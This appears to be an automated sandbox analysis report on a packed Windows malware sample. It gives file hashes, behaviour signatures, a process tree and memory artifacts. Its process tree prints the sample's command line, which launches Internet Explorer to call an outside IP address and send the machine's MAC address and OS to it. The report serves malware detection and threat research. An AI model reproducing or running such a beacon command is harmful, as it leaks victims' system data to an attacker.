Analysis

  • max time kernel
    98s
  • max time network
    135s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    03/10/2022, 06:47

General

  • Target

    b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840.exe

  • Size

    143KB

  • MD5

    3d8b4d1af46118ecfcb457ae655addac

  • SHA1

    3c5535f81659431c3c5126ffb25442c9cf98d2ae

  • SHA256

    b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840

  • SHA512

    79017dc50299fdda2acdc4f51984b750f51bebbde1d870aaa778ea9c873a3d3f89df6a1c03f316e933b7832b09df1bb52a0c84a18b7ef223e17aed91c4e7505c

  • SSDEEP

    3072:kWNSP8uUdzh5vaBAzmeu2ZNhe9HOhIAsdxn6sM0TZMl9V:bNS0uUdzh5vaBAz5PDhIAsdxn6sM0TZ6

Score
8/10
upx

Malware Config

Signatures

  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 38 IoCs
  • Modifies registry class 11 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840.exe
    "C:\Users\Admin\AppData\Local\Temp\b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840.exe"
    1⤵
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • NTFS ADS
    • Suspicious use of WriteProcessMemory
    PID:1256
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Windows\system32\..\..\Program Files\Internet Explorer\iexplore.exe" http://58.218.198.119:8080/count.asp?mac=4a-75-53-b9-bc-92&os=Microsoft Windows XP&flag=b0f9ef78d192bf79d3e69022dd9f1744&user=b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1284
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1284 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:1940

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\7F62Q38Y.txt

    Filesize

    603B

    MD5

    028209a7e1847d569ede63ce1cdae4dc

    SHA1

    08f4be432f1b74999693bb623852f49c2ecaafab

    SHA256

    dfbdebebcd08f6d97e5d238f04280a6024120b8b438ac48c0a439088619dbb1e

    SHA512

    95148e11f9a956ddbf8ae721f6c59ac84aae94a10e3592e5e8b107bf1b81cfb0316c25dfff0b04725daa6b6dd8b3240d38445e64fa536e6cf5db7239e9a044f4

  • memory/1256-54-0x00000000765B1000-0x00000000765B3000-memory.dmp

    Filesize

    8KB

  • memory/1256-55-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB